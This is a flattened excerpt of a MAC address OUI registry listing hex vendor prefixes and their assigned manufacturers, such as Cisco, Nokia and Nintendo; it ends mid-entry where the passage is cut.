Solution EC3E09 PERFORMANCE DESIGNED PRODUCTS, LLC 947C3E Polewall Norge AS 385AA8 Beijing Zhongdun Security Technology Development Co. F4A294 EAGLE WORLD DEVELOPMENT CO., LIMITED DCF755 SITRONIK BC2BD7 Revogi Innovation Co., Ltd. 286D97 SAMJIN Co., Ltd. 24ECD6 CSG Science & Technology Co.,Ltd.Hefei 7C6FF8 ShenZhen ACTO Digital Video Technology Co.,Ltd. 98CDB4 Virident Systems, Inc. A42305 Open Networking Laboratory B0FEBD Private 60699B isepos GmbH F42896 SPECTO PAINEIS ELETRONICOS LTDA 78CB33 DHC Software Co.,Ltd CC2A80 Micro-Biz intelligence solutions Co.,Ltd 1C48F9 GN Netcom A/S 9C4EBF BoxCast 34A843 KYOCERA Display Corporation 80BBEB Satmap Systems Ltd 00B78D Nanjing Shining Electric Automation Co., Ltd A05B21 ENVINET GmbH 50B8A2 ImTech Technologies LLC, E4F3E3 Shanghai iComhome Co.,Ltd. 9046B7 Vadaro Pte Ltd 04CF25 MANYCOLORS, INC. 0086A0 Private 60FE1E China Palms Telecom.Ltd B050BC SHENZHEN BASICOM ELECTRONIC CO.,LTD. 841E26 KERNEL-I Co.,LTD DC7014 Private 74CA25 Calxeda, Inc. B4346C MATSUNICHI DIGITAL TECHNOLOGY (HONG KONG) LIMITED E89218 Arcontia International AB 0075E1 Ampt, LLC D46A91 SnapAV B0793C Revolv Inc B04C05 Fresenius Medical Care Deutschland GmbH 5CA3EB Lokel s.r.o. 34CD6D CommSky Technologies D4D50D Southwest Microwave, Inc 04BFA8 ISB Corporation 8CC7D0 zhejiang ebang communication co.,ltd B8AE6E Nintendo Co., Ltd. D0EB03 Zhehua technology limited 683EEC ERECA E438F2 Advantage Controls C4C755 Beijing HuaqinWorld Technology Co.,Ltd 0C2D89 QiiQ Communications Inc. A8D236 Lightware Visual Engineering 4C55B8 Turkcell Teknoloji 788DF7 Hitron Technologies. Inc 945047 Rechnerbetriebsgruppe E031D0 SZ Telstar CO., LTD 54112F Sulzer Pump Solutions Finland Oy C8B373 Cisco-Linksys, LLC 0C2AE7 Beijing General Research Institute of Mining and Metallurgy 983071 DAIKYUNG VASCOM D49524 Clover Network, Inc. 50A715 Aboundi, Inc. C42628 Airo Wireless 30AABD Shanghai Reallytek Information Technology Co.,Ltd 0C0400 Jantar d.o.o. 687CD5 Y Soft Corporation, a.s. C04DF7 SERELEC 0C8484 Zenovia Electronics Inc. 005907 LenovoEMC Products USA, LLC 088039 Cisco SPVTG 981094 Shenzhen Vsun communication technology Co.,ltd A4F3C1 Open Source Robotics Foundation, Inc. 141330 Anakreon UK LLP 0CF405 Beijing Signalway Technologies Co.,Ltd 5061D6 Indu-Sol GmbH 2C245F Babolat VS 905692 Autotalks Ltd. A4B818 PENTA Gesellschaft für elektronische Industriedatenverarbeitung mbH FC1186 Logic3 plc C8EEA6 Shenzhen SHX Technology Co., Ltd 2481AA KSH International Co., Ltd. E01877 FUJITSU LIMITED E457A8 Stuart Manufacturing, Inc. 789966 Musilab Electronics (DongGuan)Co.,Ltd. 28CBEB One B8C46F PRIMMCON INDUSTRIES INC D8B02E Guangzhou Zonerich Business Machine Co., LTD. 4CCC34 Motorola Solutions Inc. D0D471 MVTECH co., Ltd 0868D0 Japan System Design D4223F Lenovo Mobile Communication Technology Ltd. 2CB693 Radware AC4122 Eclipse Electronic Systems Inc. 6897E8 Society of Motion Picture & Television Engineers 7CA15D GN ReSound A/S 3C081E Beijing Yupont Electric Power Technology Co.,Ltd FC58FA Shen Zhen Shi Xin Zhong Xin Technology Co.,Ltd. 30055C Brother industries, LTD. 080EA8 Velex s.r.l. F8DFA8 zte corporation A895B0 Aker Subsea Ltd 104D77 Innovative Computer Engineering 5CE0CA FeiTian United (Beijing) System Technology Co., Ltd. 60BB0C Beijing HuaqinWorld Technology Co,Ltd 10B9FE Lika srl A42C08 Masterwork Automodules 8C078C FLOW DATA INC E8E875 iS5 Communications Inc. C80E95 OmniLync Inc. C4E032 IEEE 1904.1 Working Group E08177 GreenBytes, Inc. 9C9811 Guangzhou Sunrise Electronics Development Co., Ltd B86091 Onnet Technologies and Innovations LLC A861AA Cloudview Limited 907AF1 Wally C45DD8 HDMI Forum C4EBE3 RRCN SAS 94756E QinetiQ North America 4C1A95 Novakon Co., Ltd. 301518 Ubiquitous Communication Co. ltd. 841715 GP Electronics (HK) Ltd. 58EB14 Proteus Digital Health 7C438F E-Band Communications Corp. 08F1B7 Towerstream Corpration C044E3 Shenzhen Sinkna Electronics Co., LTD C458C2 Shenzhen TATFOOK Technology Co., Ltd. D0CDE1 Scientech Electronics A00363 Robert Bosch Healthcare GmbH 6499A0 AG Elektronik AB 848E96 Embertec Pty Ltd 8C76C1 Goden Tech Limited 449B78 The Now Factory DCA989 MACANDC F0F669 Motion Analysis Corporation 18550F Cisco SPVTG 187A93 AMICCOM Electronics Corporation 8887DD DarbeeVision Inc. D0B498 Robert Bosch LLC Automotive Electronics E05597 Emergent Vision Technologies Inc. 242FFA Toshiba Global Commerce Solutions 30C82A WI-BIZ srl 88A3CC Amatis Controls C0A0C7 FAIRFIELD INDUSTRIES A0E25A Amicus SK, s.r.o. D40FB2 Applied Micro Electronics AME bv 78995C Nationz Technologies Inc 54115F Atamo Pty Ltd 8CAE4C Plugable Technologies 0CC655 Wuxi YSTen Technology Co.,Ltd. E496AE ALTOGRAPHICS Inc. F8F082 NAGTECH LLC 5C89D4 Beijing Banner Electric Co.,Ltd 182A7B Nintendo Co., Ltd. 68FB95 Generalplus Technology Inc. 4C2258 cozybit, Inc. 849DC5 Centera Photonics Inc. 580943 Private ECFC55 A. Eberle GmbH & Co. KG F05F5A Getriebebau NORD GmbH and Co. KG CC262D Verifi, LLC 3C8AE5 Tensun Information Technology(Hangzhou) Co.,LTD 7C0187 Curtis Instruments, Inc. 54F666 Berthold Technologies GmbH and Co.KG C0AA68 OSASI Technos Inc. 88D7BC DEP Company F49466 CountMax, ltd F45214 Mellanox Technologies, Inc. 10F49A T3 Innovation 3C57BD Kessler Crane Inc. 04E9E5 PJRC.COM, LLC 60BD91 Move Innovation 6851B7 PowerCloud Systems, Inc. 1C959F Veethree Electronics And Marine LLC 703811 Siemens Mobility Limited 08B738 Lite-On Technogy Corp. F8AA8A Axview Technology (Shenzhen) Co.,Ltd B4009C CableWorld Ltd. 1C11E1 Wartsila Finland Oy 50465D ASUSTek COMPUTER INC. 74BFA1 HYUNTECK CC4BFB Hellberg Safety AB 6CADEF KZ Broadband Technologies, Ltd. 745FAE TSL PPL 742D0A Norfolk Elektronik AG 485A3F WISOL 70F1E5 Xetawave LLC 34C803 Nokia Corporation E804F3 Throughtek Co., Ltd. 289EDF Danfoss Turbocor Compressors, Inc F82285 Cypress Technology CO., LTD. 24EE3A Chengdu Yingji Electronic Hi-tech Co Ltd 0CC66A Nokia Corporation 74273C ChangYang Technology (Nanjing) Co., LTD 087CBE Quintic Corp. 80AAA4 USAG A40BED Carry Technology Co.,Ltd 702393 fos4X GmbH 2C5AA3 PROMATE ELECTRONIC CO.LTD 34E0CF zte corporation 803FD6 bytes at work AG E85BF0 Imaging Diagnostics 044A50 Ramaxel Technology (Shenzhen) limited company 784405 FUJITU(HONG KONG) ELECTRONIC Co.,LTD. 38A5B6 SHENZHEN MEGMEET ELECTRICAL CO.,LTD 0CD9C1 Visteon Corporation 68AB8A RF IDeas 842BBC Modelleisenbahn GmbH 801DAA Avaya Inc 7C092B Bekey A/S C4AD21 MEDIAEDGE Corporation 0868EA EITO ELECTRONICS CO., LTD. 609084 DSSD Inc F4600D Panoptic Technology, Inc A82BD6 Shina System Co., Ltd ACCF23 Hi-flying electronics technology Co.,Ltd C401B1 SeekTech INC C0C946 MITSUYA LABORATORIES INC. F85F2A Nokia Corporation C438D3 TAGATEC CO.,LTD E8CBA1 Nokia Corporation 6CE4CE Villiger Security Solutions AG E0AAB0 SUNTAILI ENTERPRISE CO. LTD, 502ECE Asahi Electronics Co.,Ltd AC14D2 wi-daq, inc. 9C4CAE Mesa Labs 649FF7 Kone OYj 20C1AF i Wit Digital Co., Limited 085B0E Fortinet, Inc. EC42F0 ADL Embedded Solutions, Inc. 802AFA Germaneers GmbH 18421D Private 28C914 Taimag Corporation 7493A4 Zebra Technologies Corp. E47185 Securifi Ltd 30AEF6 Radio Mobile Access 78C4AB Shenzhen Runsil Technology Co.,Ltd 146A0B Cypress Electronics Limited F490EA Deciso B.V. 5CEE79 Global Digitech Co LTD 80CEB1 Theissen Training Systems GmbH FC2A54 Connected Data, Inc. A41875 Cisco Systems, Inc C8AE9C Shanghai TYD Elecronic Technology Co. Ltd 080CC9 Mission Technology Group, dba Magma 640E94 Pluribus Networks, Inc. 0CB4EF Digience Co.,Ltd. 4CAA16 AzureWave Technologies (Shanghai) Inc. 002AAF LARsys-Automation GmbH 1CE165 Marshal Corporation 4016FA EKM Metering 0C130B Uniqoteq Ltd. 2C542D Cisco Systems, Inc CC912B TE Connectivity Touch Solutions C05E79 SHENZHEN HUAXUN ARK TECHNOLOGIES CO.,LTD 58BFEA Cisco Systems, Inc FC1D59 I Smart Cities HK Ltd AC3FA4 TAIYO YUDEN CO.,LTD 6CAE8B IBM Corporation BC1401 Hitron Technologies. Inc 94CA0F Honeywell Analytics 90F72F Phillips Machine & Welding Co., Inc. F4EA67 Cisco Systems, Inc 40AC8D Data Management, Inc. AC40EA C&T Solution Inc. D05785 Pantech Co., Ltd. 408B07 Actiontec Electronics, Inc 045C06 Zmodo Technology Corporation 782544 Omnima Limited 747B7A ETH Inc. 48EA63 Zhejiang Uniview Technologies Co., Ltd. E88DF5 ZNYX Networks, Inc. 2C2D48 bct electronic GesmbH 28BA18 NextNav, LLC AC3D75 HANGZHOU ZHIWAY TECHNOLOGIES CO.,LTD. A090DE VEEDIMS,LLC F436E1 Abilis Systems SARL 002A6A Cisco Systems, Inc 608C2B Hanson Technology 642DB7 SEUNGIL ELECTRONICS 284121 OptiSense Network, LLC 38458C MyCloud Technology corporation 10E4AF APR, LLC 800A06 COMTEC co.,ltd 04F021 Compex Systems Pte Ltd 342F6E Anywire corporation 940070 Nokia Corporation BC2C55 Bear Flag Design, Inc. 0C7523 BEIJING GEHUA CATV NETWORK CO.,LTD BCA4E1 Nabto 2818FD Aditya Infotech Ltd. D8B90E Triple Domain Vision Co.,Ltd. 34BA9A Asiatelco Technologies Co. F0007F Janz - Contadores de Energia, SA 30B3A2 Shenzhen Heguang Measurement & Control Technology Co.,Ltd 645299 The Chamberlain Group, Inc 005CB1 Gospell DIGITAL TECHNOLOGY CO., LTD CCEED9 VAHLE Automation GmbH B08E1A URadio Systems Co., Ltd D8E952 KEOPSYS 6CE907 Nokia Corporation E4FA1D PAD Peripheral Advanced Design Inc. E80C75 Syncbak, Inc. 34D09B MobilMAX Technology Inc. 506441 Greenlee 9C1FDD Accupix Inc. 7CDD11 Chongqing MAS SCI&TECH.Co.,Ltd B8FD32 Zhejiang ROICX Microelectronics 70EE50 Netatmo 984A47 CHG Hospital Beds 144978 Digital Control Incorporated 2C10C1 Nintendo Co., Ltd. 8CD17B CG Mobile 3C6A7D Niigata Power Systems Co., Ltd. 908FCF UNO System Co., Ltd 40E793 Shenzhen Siviton Technology Co.,Ltd 000831 Cisco Systems, Inc 506028 Xirrus Inc. 0091FA Synapse Product Development A05AA4 Grand Products Nevada, Inc. F0EEBB VIPAR GmbH 1C5C55 PRIMA Cinema, Inc 502690 FUJITSU LIMITED 8823FE TTTech Computertechnik AG C8AF40 marco Systemanalyse und Entwicklung GmbH 40984C Casacom Solutions AG 502267 PixeLINK 3C7059 MakerBot Industries E455EA Dedicated Computing B89AED OceanServer Technology, Inc C87D77 Shenzhen Kingtech Communication Equipment Co.,Ltd 709756 Happyelectronics Co.,Ltd B820E7 Guangzhou Horizontal Information & Network Integration Co. Ltd 00CD90 MAS Elektronik AG 7C6B52 Tigaro Wireless 20C8B3 SHENZHEN BUL-TECH CO.,LTD. D4F63F IEA S.R.L. 58B0D4 ZuniData Systems Inc. 64557F NSFOCUS Information Technology Co., Ltd. 00082F Cisco Systems, Inc 386077 PEGATRON CORPORATION 0064A6 Maquet CardioVascular 988BAD Corintech Ltd. D44B5E TAIYO YUDEN CO., LTD. 640E36 TAZTAG 708105 Cisco Systems, Inc E0ED1A vastriver Technology Co., Ltd 685E6B PowerRay Co., Ltd. 941D1C TLab West Systems AB 94AE61 Alcatel Lucent 5CCEAD CDYNE Corporation AC54EC IEEE P1823 Standards Working Group 5C18B5 Talon Communications 64E161 DEP Corp. B05CE5 Nokia Corporation 3482DE Kiio Inc 4C5FD2 Alcatel-Lucent 9CC7D1 SHARP Corporation 149090 KongTop industrial(shen zhen)CO.,LTD 28C718 Altierre 7C4C58 Scale Computing, Inc. 1013EE Justec International Technology INC. 8C271D QuantHouse 24DAB6 Sistemas de Gestión Energética S.A. de C.V B07D62 Dipl.-Ing. H. Horstmann GmbH B8F5E7 WayTools, LLC B81999 Nesys 34255D Shenzhen Loadcom Technology Co.,Ltd FC0012 Toshiba Samsung Storage Technolgoy Korea Corporation 1CE192 Qisda Corporation 4CA74B Alcatel Lucent 706F81 Private 38DE60 Mohlenhoff GmbH 2839E7 Preceno Technology Pte.Ltd. D4CEB8 Enatel LTD 10EED9 Canoga Perkins Corporation C029F3 XySystem 94DE0E SmartOptics AS 807A7F ABB Genway Xiamen Electrical Equipment CO., LTD 30688C Reach Technology Inc. 181420 TEB SAS F8E7B5 µTech Tecnologia LTDA F49461 NexGen Storage 0C924E Rice Lake Weighing Systems C8A1BA Neul Ltd C43A9F Siconix Inc. 686E23 Wi3 Inc. DCF05D Letta Teknoloji 8CB82C IPitomy Communications 807DE3 Chongqing Sichuan Instrument Microcircuit Co.LTD. AC4AFE Hisense Broadband Multimedia Technology Co.,Ltd. 54F5B6 ORIENTAL PACIFIC INTERNATIONAL LIMITED 90342B Gatekeeper Systems, Inc. 5C16C7 Arista Networks 900D66 Digimore Electronics Co., Ltd B8CDA7 Maxeler Technologies Ltd. 3C096D Powerhouse Dynamics 5435DF Symeo GmbH F43D80 FAG Industrial Services GmbH DC175A Hitachi High-Technologies Corporation A4B36A JSC SDO Chromatec 8C5CA1 d-broad,INC F0DB30 Yottabyte 9C31B6 Kulite Semiconductor Products Inc 589835 Technicolor Delivery Technologies Belgium NV B4A5A9 MODI GmbH E8C320 Austco Marketing & Service (USA) ltd. C436DA Rusteletech Ltd. E8CC32 Micronet LTD D43AE9 DONGGUAN ipt INDUSTRIAL CO., LTD 10C586 BIO SOUND LAB CO., LTD. 10768A EoCell 0C3956 Observator instruments 18F650 Multimedia Pacific Limited 688470 eSSys Co.,Ltd 48DCFB Nokia Corporation E4DD79 En-Vision America, Inc. DCA6BD Beijing Lanbo Technology Co., Ltd. A45A1C smart-electronic GmbH 806459 Nimbus Inc. 8C89A5 Micro-Star INT'L CO., LTD 20B7C0 OMICRON electronics GmbH 8058C5 NovaTec Kommunikationstechnik GmbH 5C56ED 3pleplay Electronics Private Limited 78028F Adaptive Spectrum and Signal Alignment (ASSIA), Inc. 24C9DE Genoray 54055F Alcatel Lucent 6C5D63 ShenZhen Rapoo Technology Co., Ltd. DCCF94 Beijing Rongcheng Hutong Technology Co., Ltd. A4DB2E Kingspan Environmental Ltd DC16A2 Medtronic Diabetes 308CFB Dropcam F44EFD Actions Semiconductor Co.,Ltd.(Cayman Islands) 24B8D2 Opzoon Technology Co.,Ltd. A49981 FuJian Elite Power Tech CO.,LTD. B83A7B Worldplay (Canada) Inc. D0EB9E Seowoo Inc. 941673 Point Core SARL 605464 Eyedro Green Solutions Inc. C8FE30 Bejing DAYO Mobile Communication Technology Ltd. E4D71D Oraya Therapeutics B8C716 Fiberhome Telecommunication Technologies Co.,LTD D42C3D Sky Light Digital Limited 1C184A ShenZhen RicherLink Technologies Co.,LTD 0432F4 Partron 1407E0 Abrantix AG BCCD45 VOISMART 143E60 Nokia 60F673 TERUMO CORPORATION E42AD3 Magneti Marelli S.p.A. Powertrain E83EB6 RIM BC35E5 Hydro Systems Company 28CCFF Corporacion Empresarial Altra SL 94FD1D WhereWhen Corp 4C07C9 COMPUTER OFFICE Co.,Ltd. B4B88D Thuh Company 4C73A5 KOVE D428B2 ioBridge, Inc. 8427CE Corporation of the Presiding Bishop of The Church of Jesus Christ of Latter-day Saints 48D8FE ClarIDy Solutions, Inc. 304C7E Panasonic Electric Works Automation Controls Techno Co.,Ltd. 5CF207 Speco Technologies 70E843 Beijing C&W Optical Communication Technology Co.,Ltd. 2C7ECF Onzo Ltd BCBBC9 Kellendonk Elektronik GmbH B42A39 ORBIT MERRET, spol. s r. o. 74B00C Network Video Technologies, Inc E84040 Cisco Systems, Inc D89DB9 eMegatech International Corp. 405A9B ANOVO 7032D5 Athena Wireless Communications Inc 78510C LiveU Ltd. 44AAE8 Nanotec Electronic GmbH & Co. KG 103711 NORBIT ITS D075BE Reno A&E 9C5D95 VTC Electronics Corp. B8A8AF Logic S.p.A. 70A41C Advanced Wireless Dynamics S.L. D4945A COSMO CO., LTD 84DE3D Crystal Vision Ltd E06995 PEGATRON CORPORATION 1CF5E7 Turtle Industry Co., Ltd. 980EE4 Private BC6E76 Green Energy Options Ltd E828D5 Cots Technology F8DAF4 Taishan Online Technology Co., Ltd. 08D5C0 Seers Technology Co., Ltd F8769B Neopis Co., Ltd. 447DA5 VTION INFORMATION TECHNOLOGY (FUJIAN) CO.,LTD 0CCDD3 EASTRIVER TECHNOLOGY CO., LTD. CCBE71 OptiLogix BV 0C469D MS Sedco 9C220E TASCAN Systems GmbH 7CDD90 Shenzhen Ogemray Technology Co., Ltd. 0C3C65 Dome Imaging Inc 00B033 OAO "Izhevskiy radiozavod" 081735 Cisco Systems, Inc 00B342 MacroSAN Technologies Co., Ltd. 6C33A9 Magicjack LP 108CCF Cisco Systems, Inc D8E3AE CIRTEC MEDICAL SYSTEMS 08B7EC Wireless Seismic 18AF9F DIGITRONIC Automationsanlagen GmbH C8DF7C Nokia Corporation FCAF6A Qulsar Inc C89C1D Cisco Systems, Inc E46C21 messMa GmbH E0F379 Vaddio 78B6C1 AOBO Telecom Co.,Ltd B09AE2 STEMMER IMAGING GmbH 14EE9D AirNav Systems LLC 78D004 Neousys Technology Inc. 9481A4 Azuray Technologies BCE09D Eoslink BC4377 Hang Zhou Huite Technology Co.,ltd. CC7669 SEETECH AC20AA DMATEK Co., Ltd. E437D7 HENRI DEPAEPE S.A.S. E0A1D7 SFR 48CB6E Cello Electronics (UK) Ltd 006DFB Vutrix Technologies Ltd 9067B5 Alcatel-Lucent 8895B9 Unified Packet Systems Crop 78A051 iiNet Labs Pty Ltd 804F58 ThinkEco, Inc. D8FE8F IDFone Co., Ltd. 888C19 Brady Corp Asia Pacific Ltd 346F92 White Rodgers Division 34BDF9 Shanghai WDK Industrial Co.,Ltd. B44CC2 NR ELECTRIC CO., LTD 448C52 KTIS CO., Ltd 08D29A Proformatique C89383 Embedded Automation, Inc. 0475F5 CSST 4491DB Shanghai Huaqin Telecom Technology Co.,Ltd C4F464 Spica international 602A54 CardioTek B.V. BCFFAC TOPCON CORPORATION 14D76E CONCH ELECTRONIC Co.,Ltd C8A729 SYStronics Co., Ltd. 4454C0 Thompson Aerospace 64317E Dexin Corporation 3C99F7 Lansentechnology AB 708B78 citygrow technology co., ltd 8C4DEA Cerio Corporation E08A7E Exponent 507D02 BIODIT B4A4E3 Cisco Systems, Inc 94DD3F A+V Link Technologies, Corp. F44227 S & S Research Inc. 8C1F94 RF Surgical System Inc. 70A191 Trendsetter Medical, LLC 24BA30 Technical Consumer Products, Inc. E80C38 DAEYOUNG INFORMATION SYSTEM CO., LTD A8B0AE BizLink Special Cables Germany GmbH E42771 Smartlabs 34DF2A Fujikon Industrial Co.,Limited 188ED5 TP Vision Belgium N.V. - innovation site Brugge 40B2C8 Nortel Networks 70B08C Shenou Communication Equipment Co.,Ltd C03B8F Minicom Digital Signage 20FEDB M2M Solution S.A.S. 64FC8C Zonar Systems 0C8D98 TOP EIGHT IND CORP 40C7C9 Naviit Inc. 7CBB6F Cosco Electronics Co., Ltd. 20B0F7 Enclustra GmbH B4C810 Umpi srl 38580C Panaccess Systems GmbH 4451DB Raytheon BBN Technologies 585076 Linear Equipamentos Eletronicos SA F0F9F7 IES GmbH & Co. KG 94A7BC BodyMedia, Inc. C8A1B6 Shenzhen Longway Technologies Co., Ltd A8556A 3S System Technology Inc. 445EF3 Tonalite Holding B.V. 68DB96 OPWILL Technologies CO .,LTD AC83F0 Cobalt Digital Inc. CC6B98 Minetec Wireless Technologies 3C04BF PRAVIS SYSTEMS Co.Ltd., 7C55E7 YSI, Inc. 705EAA Action Target, Inc. 34F968 ATEK Products, LLC 64A232 OOO Samlight D0574C Cisco Systems, Inc F8DAE2 NDC Technologies F8C091 Highgates Technology AC9B84 Smak Tecnologia e Automacao 90F278 Radius Gateway 806629 Prescope Technologies CO.,LTD. 4C60D5 airPointe of New Hampshire 842914 EMPORIA TELECOM Produktions- und VertriebsgesmbH & Co KG BC7DD1 Radio Data Comms CC43E3 Trump s.a. 241F2C Calsys, Inc. F0BDF1 Sipod Inc. 543131 Raster Vision Ltd D0E347 Yoga F0ED1E Bilkon Bilgisayar Kontrollu Cih. Im.Ltd. C416FA Prysm Inc 506F9A Wi-Fi Alliance 9803A0 ABB n.v. Power Quality Products DCFAD5 STRONG Ges.m.b.H. 646707 Beijing Omnific Technology, Ltd. 58FD20 Systemhouse Solutions AB 6C8D65 Wireless Glue Networks, Inc. 1010B6 McCain Inc D4823E Argosy Technologies, Ltd. 009363 Uni-Link Technology Co., Ltd. 7C7673 ENMAS GmbH 6C6F18 Stereotaxis, Inc. 003532 Electro-Metrics Corporation 081FF3 Cisco Systems, Inc 44376F Young Electric Sign Co 087695 Auto Industrial Co., Ltd. ACCE8F HWA YAO TECHNOLOGIES CO., LTD 8C9236 Aus.Linx Technology Co., Ltd. 84C727 Gnodal Ltd 28CD4C Individual Computers GmbH 8C53F7 A&D ENGINEERING CO., LTD. 389F83 OTN Systems N.V. 404022 ZIV A85BB0 Shenzhen Dehoo Technology Co.,Ltd 44A689 PROMAX ELECTRONICA SA F8912A GLP German Light Products GmbH 10C73F Midas Klark Teknik Ltd 785C72 Hioso Technology Co., Ltd. 580556 Elettronica GF S.r.L. 40618E Stella-Green Co 68E41F Unglaube Identech GmbH ACA016 Cisco Systems, Inc 58E747 Deltanet AG 888717 CANON INC. 6CDC6A Promethean Limited 9055AE Ericsson, EAB/RWI/K BC6A16 tdvine 003A9D NEC Platforms, Ltd. B482FE ASKEY COMPUTER CORP 307C30 RIM BC4E3C CORE STAFF CO., LTD. F02408 Talaris (Sweden) AB 8081A5 TONGQING COMMUNICATION EQUIPMENT (SHENZHEN) Co.,Ltd 44E49A OMNITRONICS PTY LTD 08F2F4 Net One Partners Co.,Ltd. 0C7D7C Kexiang Information Technology Co, Ltd. 68EFBD Cisco Systems, Inc 98BC99 Edeltech Co.,Ltd. 904716 RORZE CORPORATION 544249 Sony Corporation F02FD8 Bi2-Vision 502A8B Telekom Research and Development Sdn Bhd EC43E6 AWCER Ltd. B09074 Fulan Electronics Limited 94F692 Geminico co.,Ltd. 3037A6 Cisco Systems, Inc DC1D9F U & B tech 0C17F1 TELECSYS 7812B8 ORANTEK LIMITED 10445A Shaanxi Hitech Electronic Co., LTD F47626 Viltechmeda UAB 38BB23 OzVision America LLC 003A9B Cisco Systems, Inc 2C3427 ERCO & GENER 80912A Lih Rong electronic Enterprise Co., Ltd. 803B9A ghe-ces electronic ag 743256 NT-ware Systemprg GmbH 4CC452 Shang Hai Tyd. Electon Technology Ltd. 7CCB0D Antaira Technologies, LLC C01E9B Pixavi AS A4DA3F Bionics Corp. A8C222 TM-Research Inc. C4E17C U2S co. 20BFDB DVL 8894F9 Gemicom Technology, Inc. 502A7E Smart electronic GmbH F0264C Sigrist-Photometer AG 10B7F6 Plastoform Industries Ltd. 448E81 VIG 0C8411 A.O. Smith Water Products 448312 Star-Net 5C8778 Cybertelbridge co.,ltd E0ABFE Orb Networks, Inc. A05DE7 DIRECTV, Inc. 003D41 Hatteland Computer AS CC5076 Ocom Communications, Inc. 087618 ViE Technologies Sdn. Bhd. D0E40B Wearable Inc. 747E1A Red Embedded Design Limited 14A86B ShenZhen Telacom Science&Technology Co., Ltd 0CC3A7 Meritec DCE2AC Lumens Digital Optics Inc. 98D88C Nortel Networks 78192E NASCENT Technology 48EB30 ETERNA TECHNOLOGY, INC. 4C322D TELEDATA NETWORKS AC867E Create New Technology (HK) Limited Company 8C598B C Technologies AB D44CA7 Informtekhnika & Communication, LLC A04025 Actioncable, Inc. 4C4B68 Mobile Device, Inc. 201257 Most Lucky Trading Ltd E8DAAA VideoHome Technology Corp. 647D81 YOKOTA INDUSTRIAL CO,.LTD 7CCFCF Shanghai SEARI Intelligent System Co., Ltd DC3350 TechSAT GmbH D8D67E GSK CNC EQUIPMENT CO.,LTD B4B5AF Minsung Electronics 04B3B6 Seamap (UK) Ltd 3032D4 Hanilstm Co., Ltd. E064BB DigiView S.r.l. 68AAD2 DATECS LTD., A4DE50 Total Walther GmbH F0BCC8 MaxID (Pty) Ltd 24828A Prowave Technologies Ltd. 68CC9C Mine Site Technologies 1CF061 SCAPS GmbH A893E6 JIANGXI JINGGANGSHAN CKING COMMUNICATION TECHNOLOGY CO.,LTD C4AAA1 SUMMIT DEVELOPMENT, spol.s r.o. 146E0A Private 0CE709 Fox Crypto B.V. 6C0F6A JDC Tech Co., Ltd. 04B466 BSP Co., Ltd. 002707 Lift Complex DS, JSC 0026FE MKD Technology Inc. 00271B Alec Sicherheitssysteme GmbH 002718 Suzhou NEW SEAUNION Video Technology Co.,Ltd 00270B Adura Technologies 00270D Cisco Systems, Inc 0026D0 Semihalf 0026D2 Pcube Systems, Inc. 0026CD PurpleComm, Inc. 0026AE Wireless Measurement Ltd 0026B1 Navis Auto Motive Systems, Inc. 0026AA Kenmec Mechanical Engineering Co., Ltd. 0026A0 moblic 0026BC General Jack Technology Ltd. 0026D7 KM Electornic Technology Co., Ltd. 0026E5 AEG Power Solutions 0026E3 DTI 002665 ProtectedLogic Corporation 002660 Logiways 002696 NOOLIX Co., Ltd 00269A Carina System Co., Ltd. 002695 ZT Group Int'l Inc 002693 QVidium Technologies, Inc. 00263C Bachmann Technology GmbH & Co. KG 00263D MIA Corporation 002632 Instrumentation Technologies d.d. 00262C IKT Advanced Technologies s.r.o. 00262E Chengdu Jiuzhou Electronic Technology Inc 002629 Juphoon System Software Inc. 002610 Apacewave Technologies 00260E Ablaze Systems, LLC 00260D Mercury Systems, Inc. 00260A Cisco Systems, Inc 002603 Shenzhen Wistar Technology Co., Ltd 002625 MediaSputnik 002626 Geophysical Survey Systems, Inc. 00261B LAUREL BANK MACHINES CO., LTD. 002614 KTNF 002648 Emitech Corp. 002645 Circontrol S.A. 00263E Trapeze Networks 002678 Logic Instrument SA 002677 DEIF A/S 002670 Cinch Connectors 002671 AUTOVISION Co., Ltd 00268E Alta Solutions, Inc. 0025F9 GMK electronic design GmbH 0025F7 Ansaldo STS USA 0025B7 Costar electronics, inc., 0025A6 Central Network Solution Co., Ltd. 0025AA Beijing Soul Technology Co.,Ltd. 0025D5 Robonica (Pty) Ltd 0025CC Mobile Communications Korea Incorporated 0025C8 S-Access GmbH 0025A3 Trimax Wireless, Inc. 00259C Cisco-Linksys, LLC 0025A2 Alta Definicion LINCEO S.L. 002593 DatNet Informatikai Kft. 0025E2 Everspring Industry Co., Ltd. 0025E1 SHANGHAI SEEYOO ELECTRONIC & TECHNOLOGY CO., LTD 0025DA Secura Key 0025DB ATI Electronics(Shenzhen) Co., LTD 00258E The Weather Channel 002588 Genie Industries, Inc. 002580 Equipson S.A. 00257D PointRed Telecom Private Ltd. 00256D Broadband Forum 00256C "Azimut" Production Association JSC 002563 Luxtera Inc 00254E Vertex Wireless Co., Ltd. 002546 Cisco Systems, Inc 002545 Cisco Systems, Inc 002542 Pittasoft 002560 Ibridge Networks & Communications Ltd. 0025C0 ZillionTV Corporation 0025BD Italdata Ingegneria dell'Idea S.p.A. 0024B8 free alliance sdn bhd 0024B3 Graf-Syteco GmbH & Co. KG 0024F6 MIYOSHI ELECTRONICS CORPORATION 0024F0 Seanodes 0024D0 Shenzhen SOGOOD Industry CO.,LTD. 0024CC Fascinations Toys and Gifts, Inc. 0024CB Autonet Mobile 0024D1 Thomson Inc. 0024C9 Broadband Solutions Group 0024CA Tobii Technology AB 0024C7 Mobilarm Ltd 00250D GZT Telkom-Telmor sp. z o.o. 00250E gt german telematics gmbh 002508 Maquet Cardiopulmonary AG 00251B Philips CareServant 002518 Power PLUS Communications AG 002515 SFR 002536 Oki Electric Industry Co., Ltd. 002541 Maquet Critical Care AB 002531 Cloud Engines, Inc. 00252D Kiryung Electronics 00252B Stirling Energy Systems 002524 Lightcomm Technology Co., Ltd 002522 ASRock Incorporation 0024FC QuoPin Co., Ltd. 0024FB Private 0024FA Hilger u. Kern GMBH 0024DF Digitalbox Europe GmbH 002425 Shenzhenshi chuangzhicheng Technology Co.,Ltd 002427 SSI COMPUTER CORP 00241C FuGang Electronic (DG) Co.,Ltd 0024AA Dycor Technologies Ltd. 0024A9 Ag Leader Technology 0024A6 TELESTAR DIGITAL GmbH 0024A3 Sonim Technologies Inc 002419 Private 002415 Magnetic Autocontrol GmbH 002411 PharmaSmart LLC 00240F Ishii Tool & Engineering Corporation 002446 MMB Research Inc. 002445 Adtran Inc 00243F Storwize, Inc. 002440 Halo Monitoring, Inc. 002472 ReDriven Power Inc. 002471 Fusion MultiSystems dba Fusion-io 002474 Autronica Fire And Securirty 002463 Phybridge Inc 00249B Action Star Enterprise Co., 